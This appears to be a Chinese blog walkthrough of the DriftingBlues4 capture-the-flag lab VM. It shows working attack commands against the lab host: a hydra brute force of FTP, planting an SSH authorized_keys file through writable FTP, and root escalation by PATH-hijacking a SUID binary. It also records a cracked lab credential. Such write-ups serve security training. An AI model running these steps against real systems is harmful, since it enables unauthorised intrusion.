打个靶机-driftingblues4

DingTom

已于 2024-07-30 22:28:57 修改

阅读量1.2k

点赞数 33

分类专栏：网络安全靶机文章标签：网络安全 web安全安全

于 2024-07-30 22:12:30 首次发布

本文链接：https://blog.csdn.net/dkeyi/article/details/140806506

版权

靶机同时被 2 个专栏收录

8 篇文章 1 订阅

订阅专栏

网络安全

6 篇文章 1 订阅

订阅专栏

题外话：上一篇好多人看了，有点开心，但是本人技术比较菜，烦请各位大佬能指导一二。这些靶机大多都具有CTF的性质，有点像解谜之类的，所以很多思路就是你玩这方面的靶机玩多了，自然而然也就有了。就跟解谜游戏一样，你看到了什么样的提示，结合你的渗透知识，也就有了思路，我尽量把其中的一些有趣的思路和心路历程给叙述一下。

一、信息收集

首先当然进行nmap扫描，在打靶机的时候，nmap的作用很多，你可以指定nmap进行端口探测，同时，nmap默认进行的是tcp扫描，nmap可以通过使用 -sU 参数udp扫描，原理是向目标主机的udp端口发送探测包。如果收到回复“ICMP port unreachable”，那么就可以判断该端口是关闭的；如果没有收到回复，那可能说明udp端口是开放的或者被屏蔽的。但是udp扫描比tcp扫描慢的多，所以你可以去扫描全局，也可以去专门用-p参数去指定常用的一些端口号。

但是这里我要说一些很重要的事情，udp扫描我个人是建议去扫全局，一般我们可以直接根据web页面和tcp端口去寻找突破点，没必要去盯着udp的端口扫描，而且我遇到过靶机它的服务并没有开放在一个常用的端口，遑论现实中，如果你架设了一个udp的tftp服务，你肯定不会放在常用的端口上，你会放在25633之类的奇怪端口上，尽管udp端口很多很慢，尽量养成全局扫描的好习惯。

然后，udp扫描的速度和线程尽量不要太快，因为udp端口的误报率很高很高，你线程太高会显示都开放的，一些现实中的服务器会将所有的udp端口全部filter,没啥太大作用...

# Nmap 7.93 scan initiated Sat Jul 29 11:33:48 2023 as: nmap -sT -sC -sV -O -A -p21,22,80 -o nmap_details.txt 192.168.56.111

mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers

Nmap scan report for 192.168.56.111

Host is up (0.00069s latency).

PORT   STATE SERVICE VERSION

21/tcp open ftp     ProFTPD

22/tcp open ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)

| ssh-hostkey:

|   2048 6afed61723cb90792bb12d3753974658 (RSA)

|   256 5bc468d18959d748b096f311871c08ac (ECDSA)

|_ 256 613966881d8ff1d040611e99c51a1ff4 (ED25519)

80/tcp open http    Apache httpd 2.4.38 ((Debian))

|_http-server-header: Apache/2.4.38 (Debian)

|_http-title: Site doesn't have a title (text/html).

MAC Address: 08:00:27:53:7A:C7 (Oracle VirtualBox virtual NIC)

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Aggressive OS guesses: Linux 5.0 - 5.3 (99%), Linux 2.6.32 (96%), Linux 3.2 - 4.9 (96%), Netgear ReadyNAS 2100 (RAIDiator 4.2.24) (96%), Linux 2.6.32 - 3.10 (96%), Linux 4.15 - 5.6 (96%), Linux 5.3 - 5.4 (96%), Sony X75CH-series Android TV (Android 5.0) (95%), Linux 3.1 (95%), Linux 3.2 (95%)

No exact OS matches for host (test conditions non-ideal).

Network Distance: 1 hop

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

上面是nmap 的结果，我省略了主机发现，端口发现等非常非常基础的操作，以后也会省略，这些十分简单，而且每个人的习惯都不同，我尽量将有价值的信息写出来。

可以看到上面有ProFTPD和OpenSSH服务，我会专门写一些附加博客，来介绍这些常见的服务，但是在这里我就不会赘述了。

二、摸索渗透阶段

WEB：

你当然可以看一眼ftp服务里有什么，但是在nmap扫描阶段你只能去看它web页面。所以其实先web渗透是很正常的。

curl -i -L http://192.168.56.111

HTTP/1.1 200 OK
Date: Sat, 29 Jul 2023 15:34:25 GMT
Server: Apache/2.4.38 (Debian)
Last-Modified: Sat, 09 Jan 2021 20:20:38 GMT
ETag: "199-5b87d67f3b180"
Accept-Ranges: bytes
Content-Length: 409
Vary: Accept-Encoding
Content-Type: text/html

<!DOCTYPE html>
<html>
<body>
<h1 class="aligncenter">Under Construction</h1>
<p class="aligncenter">please stand by</p>
<style>
.aligncenter {
    text-align: center;
}
</style>

<!--Z28gYmFjayBpbnRydWRlciEhISBkR2xuYUhRZ2MyVmpkWEpwZEhrZ1pISnBjSEJwYmlCaFUwSnZZak5DYkVsSWJIWmtVMlI1V2xOQ2FHSnBRbXhpV0VKellqTnNiRnBUUWsxTmJYZ3dWMjAxVjJGdFJYbGlTRlpoVFdwR2IxZHJUVEZOUjFaSlZWUXdQUT09-->
</body>
</html>

在这里我要说一下，并不是我不喜欢用浏览器器看这个页面，很多时候有效的信息是在注释里，web页面会隐藏，但是他的源代码不会。

发现有base64，简单decode一下

echo 'Z28gYmFjayBpbnRydWRlciEhISBkR2xuYUhRZ2MyVmpkWEpwZEhrZ1pISnBjSEJwYmlCaFUwSnZZak5DYkVsSWJIWmtVMlI1V2xOQ2FHSnBRbXhpV0VKellqTnNiRnBUUWsxTmJYZ3dWMjAxVjJGdFJYbGlTRlpoVFdwR2IxZHJUVEZOUjFaSlZWUXdQUT09' | base64 -d

go back intruder!!! 
dGlnaHQgc2VjdXJpdHkgZHJpcHBpbiBhU0JvYjNCbElIbHZkU2R5WlNCaGJpQmxiWEJzYjNsbFpTQk1NbXgwV201V2FtRXliSFZhTWpGb1drTTFNR1ZJVVQwP

有意思，继续

echo 'dGlnaHQgc2VjdXJpdHkgZHJpcHBpbiBhU0JvYjNCbElIbHZkU2R5WlNCaGJpQmxiWEJzYjNsbFpTQk1NbXgwV201V2FtRXliSFZhTWpGb1drTTFNR1ZJVVQwPQ==' | base64 -d

tight security drippin aSBob3BlIHlvdSdyZSBhbiBlbXBsb3llZSBMMmx0Wm5WamEybHVaMjFoWkM1MGVIUT0=

梅开二度，不多说，继续

echo 'aSBob3BlIHlvdSdyZSBhbiBlbXBsb3llZSBMMmx0Wm5WamEybHVaMjFoWkM1MGVIUT0=' |base64 -d

i hope you're an employee L2ltZnVja2luZ21hZC50eHQ=

三羊开泰！继续

echo 'L2ltZnVja2luZ21hZC50eHQ=' | base64 -d

/imfuckingmad.txt

很简单的一个敏感目录，直接拿下来

imfuckingmad.txt:

+++++ +++++ [->++ +++++ +++<] >++++ +++++ .<+++ [->-- -<]>- --.<+ ++[->

+++<] >++++ .<+++ +++++ [->-- ----- -<]>- ----- ----- ---.< +++++ ++++[

->+++ +++++ +<]>+ +++++ .<+++ +[->- ---<] >--.< +++++ +++[- >---- ----<

]>--- --.<+ +++++ ++[-> +++++ +++<] >+.<+ +++[- >++++ <]>+. <+++[ ->---

<]>-- --.<+ +++++ ++[-> ----- ---<] >---- -.<++ +++++ +[->+ +++++ ++<]>

+.<++ +++++ +[->- ----- --<]> -.<++ +++++ ++[-> +++++ ++++< ]>+++ .<+++

[->-- -<]>- ----- .--.+ ++++. <++++ ++++[ ->--- ----- <]>-- ----- -.<++

+++++ +[->+ +++++ ++<]> +++.< +++[- >+++< ]>+++ .--.+ ++.<+ ++[-> ---<]

>---- --.<+ ++[-> +++<] >++++ .<+++ [->++ +<]>+ +.<++ +++++ ++[-> -----

----< ]>--- ----- .<+++ +++++ [->++ +++++ +<]>+ .<+++ [->++ +<]>+ +++.<

+++[- >---< ]>-.< +++++ +++[- >---- ----< ]>--- -.<++ +++++ ++[-> +++++

++++< ]>++. +.<++ +[->- --<]> --.++ +..<+ +++++ ++[-> ----- ---<] >----

----- ---.< +++++ +++[- >++++ ++++< ]>+++ ++++. --.<+ ++[-> +++<] >++++

++..< +++[- >---< ]>--. +++++ .---- ---.< +++++ +++[- >---- ----< ]>---

----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +.--- ----. ++.++ +++++ +.---

---.- .<+++ +++[- >---- --<]> -...< +++++ [->-- ---<] >---- --.<+ +++++

+++[- >++++ +++++ <]>++ ++++. <+++[ ->--- <]>-- ----. ----- --.<+ +++[-

>++++ <]>++ +.<++ +++++ ++[-> ----- ----< ]>--- .<+++ +++++ +[->+ +++++

+++<] >+++. <+++[ ->--- <]>-- -.--- .<+++ +++++ [->-- ----- -<]>- ----.

<++++ +++++ [->++ +++++ ++<]> ++.<+ ++[-> ---<] >--.+ .<+++ [->++ +<]>+

+.<++ +++++ [->-- ----- <]>-- --... <++++ +[->- ----< ]>--- ---.< +++++

+++[- >++++ ++++< ]>+++ ++.++ +++++ ++.+. +++++ +.<++ +[->- --<]> -----

.+.<+ +++++ ++[-> ----- ---<] >---- ----. <++++ ++++[ ->+++ +++++ <]>++

+++++ ++.<+ ++[-> +++<] >+.<+ +++++ +++[- >---- ----- <]>-- .<+++ +++++

[->++ +++++ +<]>+ ++++. +++++ ++++. +.+++ +++.< +++[- >---< ]>--- --.+.

<++++ ++++[ ->--- ----- <]>-- ----- ...-. <++++ [->-- --<]> ---.- --.<+

++++[ ->+++ ++<]> .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.

.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]

>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++

+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.

.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]

>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++

+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.

.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]

>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++

+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.

.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]

>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++

+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.

.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]

>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++

+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.

.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]

>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++

+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.

.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]

>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++

+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.

.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]

>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++

+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.

.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]

>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++

+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.

.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]

>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++

+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.

.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]

>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++

+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.

.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]

>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++

+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.

.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]

>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++

+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.

.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]

>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++

+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.

.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]

>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++

+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.

.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]

>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++

+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.

.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]

>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++

+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.

.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]

>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++

+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.

.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]

>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++

+++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>.

.<+++ +[->- ---<] >---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<]

>---- --.-- -.<++ +++[- >++++ +<]>. .<+++ +[->- ---<] >---- --.-- -.<++

+++[- >++++ +<]>. <++++ [->-- --<]> ----- -.--- .+++. ---.< +++++ +[->+

+++++ <]>+. <++++ +++[- >++++ +++<] >++++ +++++ .<+++ +[->- ---<] >----

-.<++ ++[-> ++++< ]>+++ ++.<+ +++[- >---- <]>-- ----. <++++ +[->- ----<

]>--- ----. <++++ [->++ ++<]> .<+++ +++[- >++++ ++<]> +++++ +++++ +.<++

+++++ [->-- ----- <]>-- ----- ----- --.<+ ++++[ ->+++ ++<]> +++++ +++.<

+++[- >+++< ]>+++ ++.++ +++++ .<+++ +[->- ---<] >---- -.<++ ++[-> ----<

]>-.< +++++ +[->+ +++++ <]>+. <++++ +++[- >---- ---<]

这时候你很蒙b，这是啥啊？

我要说的是，ctf风格就是这样的，很多迥乎不同的编码形式你都需要了解一下

这是很出名的brainf**k（BF），BF语言用 > < + - . , [ ] 八种符号来替换C语言的各种语法和命令

来源百度：

字符	含义
>	指针加一
<	指针减一
+	指针指向的字节的值加一
-	指针指向的字节的值减一
.	输出指针指向的单元内容（ASCⅡ码）
,	输入内容到指针指向的单元（ASCⅡ码）
[	如果指针指向的单元值为零，向后跳转到对应的]指令的次一指令处
]	如果指针指向的单元值不为零，向前跳转到对应的[指令的次一指令处

Brainfuck	C
>	++ptr;
<	--ptr;
+	++*ptr;
-	--*ptr;
.	putchar(*ptr);
,	*ptr =getch();
[	while (*ptr) {
]	}

在线上的brainfuck decode里进行解码

Brainfuck/OoK加密解密 - Bugku CTF

获得文件地址/iTiS3Cr3TbiTCh.png

wget http://192.168.56.111//iTiS3Cr3TbiTCh.png

tips:

# qr hello > hello.png 生成hello的二维码

# zbaring hello.png 进行decode二维码信息

zbarimg iTiS3Cr3TbiTCh.png

http://i.imgur.com/a4JjS76

获得四个人名:

luther

gary

hubert

clark

用以上人名建立user.txt用作字典，用来以后可能的爆破操作

FTP:

ftp匿名登陆后发现没有权限

尝试爆破！！！

这时候我聊一下爆破的一些须知。

爆破什么时候进行呢？

就是你有相关用户的信息，可以做简单的社会工程学字典了，你就可以考虑爆破了

没有路子走了也会进行爆破

hydra -L user.dir -P /usr/share/wordlists/rockyou.txt 192.168.56.111 ftp -vV -f

建议你们了解一下rockyou这个字典，在你的kali的wordlist目录下，默认压缩包形式，需要解压，是一个常用账号（就是常见人名）和密码的集合，ctf中经常用到。

[21] host:192.168.56.111     login:luther    password:mypics

登录ftp服务，登录成功（不需要展示一下ftp怎么登陆吧，不会的百度一下ftp，我明天写一个这里面工具和服务的介绍。）

ftp> ls

229 Entering Extended Passive Mode (|||57160|)
150 Opening ASCII mode data connection for file list
drwxrwxrwx   2 1001     1001         4096 Jan  9  2021 hubert
-rw-r--r--   1 root     root           50 Jul 29 15:56 sync_log

看到当前目录命名和文件属性可以猜想是/home路径下（也可以不是，只是猜想，一般靶机仿照的是个人用户的服务器，个人不会去做那么多的分类策略，尤其是linux）

进入hubert用户目录下

ftp> mkdir .ssh

257 "/hubert/.ssh" - Directory successfully created

在本地（你的kali机器上）生成ssh公私钥（这一步我就没必要展开讲了SSH公/私秘钥的生成及使用_openssh生成公钥和私钥-CSDN博客这个看看就ok了了解一下这是openssh服务的操作）

将id_rsa.pub改名为authorized_keys丢上去

ftp> put authorized_keys

local: authorized_keys remote: authorized_keys
229 Entering Extended Passive Mode (|||64899|)
150 Opening BINARY mode data connection for authorized_keys
100% |*********************************************************************************|   563        2.94 MiB/s    00:00 ETA
226 Transfer complete

我在这里权当大家是新手了，put是ftp上传文件，这里的authorized_keys是在我终端原来的路径下的，你用get同理下载的文件会在你的终端原路径下。

ssh hubert@192.168.56.111 -i id_rsa

Warning: Permanently added '192.168.56.111' (ED25519) to the list of known hosts.
Linux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
hubert@driftingblues:~$

ok登陆成功直接省大事了。

三、提权

hubert@driftingblues:~$ find / -perm -u=s -type f 2>/dev/null

老规矩。

/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/passwd
/usr/bin/getinfo
/usr/bin/mount
/usr/bin/chfn
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/chsh

唉，又有getinfo，就喜欢这个，driftingblues3也有这个。

hubert@driftingblues:~$ getinfo

###################
ip address
###################

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
    link/ether 08:00:27:53:7a:c7 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.111/24 brd 192.168.56.255 scope global dynamic enp0s3
       valid_lft 401sec preferred_lft 401sec
    inet6 fe80::a00:27ff:fe53:7ac7/64 scope link 
       valid_lft forever preferred_lft forever
###################
hosts
###################

127.0.0.1       localhost
127.0.1.1       driftingblues

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
###################
os info
###################

执行结果也一摸一样，那还是路径劫持吧。

直接发代码块了，就不一个一个来了，上一篇有一摸一样的。

hubert@driftingblues:~$ touch /tmp/ip
hubert@driftingblues:~$ echo '/bin/bash -p' > /tmp/ip
hubert@driftingblues:~$ export PATH=/tmp:$PATH
hubert@driftingblues:~$ chmod +x /tmp/ip
hubert@driftingblues:~$ getinfo
###################
ip address
###################

root@driftingblues:~# id
uid=0(root) gid=1001(hubert) groups=1001(hubert)

root@driftingblues:/root# cat root.txt 
flag 2/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█

congratulations!

总结：提权有点low，跟3一个样，但是前面比较好玩，明天不更新打个bg系列了，回去更新一下之前用到的工具和服务相关，再把上一年的垃圾博客修改一下，每天写个这个要用3h，真的累，但是我看到有人看我就不胜荣幸，感谢各位了。